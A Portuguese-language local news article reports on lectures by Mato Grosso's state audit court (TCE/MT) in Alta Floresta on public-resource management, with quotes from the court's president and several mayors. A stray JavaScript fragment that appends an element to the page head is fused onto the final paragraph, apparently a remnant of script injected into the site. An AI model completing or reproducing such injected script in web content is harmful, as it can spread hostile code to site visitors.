Capa / Cidades / Palestras do TCE devem melhorar eficácia na gestão de recursos, avaliam participantes

Palestras do TCE devem melhorar eficácia na gestão de recursos, avaliam participantes

KODAK Digital Still Camera

Da Redação

Servidores e gestores públicos de 9 municípios do entorno de Alta Floresta participaram ontem de uma série de palestras voltadas à melhorar a eficácia nos serviços públicos. Temas em torno da Lei de Improbidade Administrativa, Contas públicas em final de mandato, transição de governos e formação de preços de referência, foram debatidos à exaustão desde as primeiras horas da manhã de quinta-feira no auditório do Hotel Floresta Amazônica. Os participantes tiveram a oportunidade de fazer perguntas diretamente aos técnicos do TCE/MT. As palestras do programa “Gestão Eficaz”, fazem parte da série de atividades desenvolvidas pelo TCE nesta semana em Alta Floresta que começaram no dia 27, terça-feira e irão se estender até às 17 horas de hoje.
A série de palestras foi aberta com a presença do presidente do Tribunal de Contas do Estado, conselheiro Antônio Joaquim e o presidente da Associação matogrossense dos Municípios, Neurilan Fraga. O prefeito de Alta Floresta, Asiel Bezerra recepcionou as autoridades. Asiel comemorou o fato do TCE vir mais perto dos municípios. “O Tribunal saiu da capital e veio para o interior. Essa capacitação aos vereadores e aos gestores é muito importante, se tivesse essa capacitação em Cuiabá, no máximo iriam os prefeitos, aqui não, aqui todos os gestores estão presentes e quem ganha com isso é a população”, disse o prefeito Asiel Bezerra.
Segundo Antônio Joaquim, a vinda do TCE à região, tem o objetivo de mostrar ensinar aos gestores os caminhos corretos para a gestão de recursos públicos, qualificando os servidores e gestores, para evitar o cometimento de erros que possam ocasionar perdas para os municípios e aos próprios gestores. Antônio Joaquim chegou a utilizar o termo de que o TCE não veio como auditor ou fiscal de contas, e sim como orientador, interagindo com a sociedade na busca da melhor eficácia na gestão. “Neste momento nós estamos aqui como professor, como orientador, como capacitador das leis, ensinando, orientando para evitar o mínimo de erros possível do gestor, esse é o foco do programa de Gestão Eficaz, voltados aos vereadores, prefeitos e servidores municipais”, explicou Antônio Joaquim.
O prefeito Vicente Medeiros, de Nova Canaã do Norte, veio ao encontro e trouxe parte de sua equipe, como secretários e funcionários do setor de compras e licitações e controlador interno, no intuito de aproveitar melhor as informações que estão sendo repassadas. Ele classificou com grande importância para gestores e fundamental para a sociedade, que ganha com a qualidade final da prestação de serviços. “É importante porque os conselheiros estão ensinando como fazer um trabalho para que não se erre nas prefeituras, que ajude os prefeitos a administrar também. É de grande importância essa reunião, porque o prefeito não tem condições de levar todos os funcionários até Cuiabá e eles vindo até nós, vão ensinar mais os nossos servidores a estar trabalhando melhor”, disse o prefeito.
O prefeito de Paranaíta enviou praticamente toda a sua equipe de servidores e secretários envolvidos diretamente com a gestão de recursos. A “delegação”, contou com 45 pessoas, dentre secretários, servidores do departamento de Licitação, Comunicação, controladoria, dentre outros. Segundo o contador, Itajiba Dela Justina, a decisão do prefeito Tony Rufatto de que a sua equipe participasse de forma incisiva, mostra a preocupação da gestão em melhorar ainda mais o atendimento ao cidadão. “É muito importante para nós servidores do município termos esta aprendizagem, porque a gente fica lá no município só trabalhando em cima das tarefas, muitas vezes a gente, por mais boa vontade que tenha de fazer a coisa correta, tem informações que a gente não sabe, então é interessante muito importante esta aprendizagem aqui”, afirmou Itajiba.
Creomar Camilo, secretário de finanças de Alta Floresta também comemorou a vinda da equipe do TCE para este ciclo de palestras, afirmando que a determinação que recebeu do prefeito Asiel Bezerra é para que os servidores de todos os departamentos participem das palestras, com o intuito de melhorar o conhecimento. “Todo o conhecimento que você adquire, você coloca isso em prática. As vezes a gente erra não por querer errar, mas por não ter conhecimento de causa daquilo que a gente esta fazendo e esse ciclo de palestras ajuda muito os servidores a trabalhar de forma mais correta”, afirmou o secretário.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top